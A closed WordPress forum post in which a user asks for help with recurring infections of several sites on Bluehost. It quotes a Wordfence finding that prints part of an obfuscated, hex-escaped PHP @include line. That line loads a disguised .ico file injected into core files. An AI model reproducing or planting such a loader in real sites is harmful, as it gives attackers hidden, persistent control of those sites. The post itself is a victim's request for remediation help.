malicious files keep showing up
-
It appears my account that hosts several WordPress websites is having a malicious file issue. I don’t have much experience in fixing these type of things.
I have a Bluehost account.
It is the cloud hosting plan, but shared I believe.
I am using Wordfence to restore files.Files being affected are:
File appears to be malicious: wp-config.php
wp-settings.php
File appears to be malicious: index.php
WordPress core file modified: index.php
WordPress core file modified: wp-settings.phpThis is an example of the code I see
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@include “\x2fh\x6fm\x651\x2fm\x61v\x65r\x69f\x35/\x70u\x62l\x69c\x5fh\x74m\x6c/\x73i\x67n\x73o\x68i\x6f/\x77p\x2dc\x6fn\x74e\x6et\x2fg\x61l\x6ce\x72y\x2ff\x61v\x69c\x6fn\x5f4\x641\x622\x66.\x69c\x6f”…”. The infection type is: Misc:PHP/ico.
I am not even sure what that code does or means.I restore thru Wordfence…but it keeps happening and I have several websites. How do I make this stop? Is there a simple way to take care of this? I think it is odd that this is happening to new installs too, so I am not sure what to do.
- The topic ‘malicious files keep showing up’ is closed to new replies.